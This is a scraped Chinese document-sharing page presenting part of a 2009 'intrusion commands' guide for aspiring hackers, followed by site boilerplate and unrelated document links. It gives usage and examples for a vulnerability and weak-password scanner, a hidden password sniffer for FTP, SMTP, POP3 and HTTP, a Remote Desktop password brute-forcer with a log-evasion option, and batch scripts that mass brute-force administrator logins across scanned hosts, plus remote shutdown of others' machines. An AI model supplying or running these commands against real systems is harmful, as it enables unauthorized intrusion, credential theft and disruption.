全文预览已结束
下载本文档
版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
网络高手、黑客必备初级命令大全(cmd dos) 入侵命令 (二)2009年12月18日 星期五 09:06八:2、扫锚工具:xscan.exe基本格式 xscan -host - 其他选项 扫锚起始IP到终止IP段的所有主机信息 xscan -file 其他选项 扫锚主机IP列表文件名中的所有主机信息 检测项目 -active 检测主机是否存活 -os 检测远程操作系统类型(通过NETBIOS和SNMP协议) -port 检测常用服务的端口状态 -ftp 检测FTP弱口令 -pub 检测FTP服务匿名用户写权限 -pop3 检测POP3-Server弱口令 -smtp 检测SMTP-Server漏洞 -sql 检测SQL-Server弱口令 -smb 检测NT-Server弱口令 -iis 检测IIS编码/解码漏洞 -cgi 检测CGI漏洞 -nasl 加载Nessus攻击脚本 -all 检测以上所有项目 其它选项 -i 适配器编号 设置网络适配器, 可通过-l参数获取 -l 显示所有网络适配器 -v 显示详细扫描进度 -p 跳过没有响应的主机 -o 跳过没有检测到开放端口的主机 -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10 -log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件) 用法示例 xscan -host -55 -all -active -p 检测-55网段内主机的所有漏洞,跳过无响应的主机 xscan -host -55 -port -smb -t 150 -o 检测-55网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机 xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机九:3、命令行方式嗅探器: xsniff.exe可捕获局域网内FTP/SMTP/POP3/HTTP协议密码参数说明 -tcp 输出TCP数据报 -udp 输出UDP数据报 -icmp 输出ICMP数据报 -pass 过滤密码信息 -hide 后台运行 -host 解析主机名 -addr IP地址 过滤IP地址 -port 端口 过滤端口 -log 文件名 将输出保存到文件 -asc 以ASCII形式输出 -hex 以16进制形式输出 用法示例 xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中 xsniff.exe -tcp -udp -asc -addr 嗅探并过滤tcp和udp信息并以ASCII格式输出 4、终端服务密码破解: tscrack.exe参数说明 -h 显示使用帮助 -v 显示版本信息 -s 在屏幕上打出解密能力 -b 密码错误时发出的声音 -t 同是发出多个连接(多线程) -N Prevent System Log entries on targeted server -U 卸载移除tscrack组件 -f 使用f后面的密码 -F 间隔时间(频率) -l 使用l后面的用户名 -w 使用w后面的密码字典 -p 使用p后面的密码 -D 登录主页面 用法示例 tscrack -l administrator -w pass.dic 远程用密码字典文件暴破主机的administrator的登陆密码 tscrack -l administrator -p 123456 用密码123456远程登陆的administrator用户 if not exist ipcscan.txt goto noscan for /f tokens=1 delims= %i in (3389.txt) do call hack.bat %i nscan echo 3389.txt no find or scan faild (存为3389.bat) (假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt) 3389.bat意思是:从3389.txt文件中取一个IP,接着运行hack.bat if not exist tscrack.exe goto noscan tscrack %1 -l administrator -w pass.dic rouji.txt :noscan echo tscrack.exe no find or scan faild (存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下;就可以等待结果了) hack.bat意思是:运行tscrack.exe用字典暴破3389.txt中所有主机的administrator密码,并将破解结果保存在rouji.txt文件中。 5、其它:Shutdown.exe Shutdown IP地址 t:20 20秒后将对方NT自动关闭(Windows 2003系统自带工具,在W
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 谚语赋能:大学生挫折应对与心理健康的深度剖析
- 调肝和中法治疗功能性消化不良餐后不适综合征的临床研究与机理探析
- 调凝剂对水泥水化历程的调控机制与作用路径深度剖析
- 语言测试与评估课程:职前英语教师评价素养蜕变之研
- 2026浙江杭州市临安区城市发展投资集团有限公司招聘3人考试模拟试题及答案详解
- 浙商银行成都分行2027届暑期招聘笔试模拟试题及答案详解
- 语域理论视域下高职外贸英语函电写作的优化与提升
- 2026年嘉兴市桐乡市教育系统公开招聘教师34人(第三批)笔试模拟试题及答案详解
- 2026云南红河州第三人民医院编外人员招聘28人(第一期)笔试参考题库及答案详解
- 2026江苏南京机电职业技术学院招聘高层次人才15人(第一批)考试参考题库及答案详解
- 酸菜鱼鱼片质量标准
- 2024年新统编版七年级历史上册全册教学课件
- 《人工智能伦理》教学大纲
- 借调协议解除协议书范本
- 夏热冬冷地区居住建筑节能设计标准
- 2025年人教版高中生物必修二默写(学生版)
- 2025年公务员考试行测逻辑推理试题库及答案(共200题)
- 甲状腺眼病的生物制剂治疗专家共识(2025)解读
- 商飞在线测评题库
- 宫颈后装放疗相关知识
- 《重点新材料首批次应用示范指导目录(2024年版)》
评论
0/150
提交评论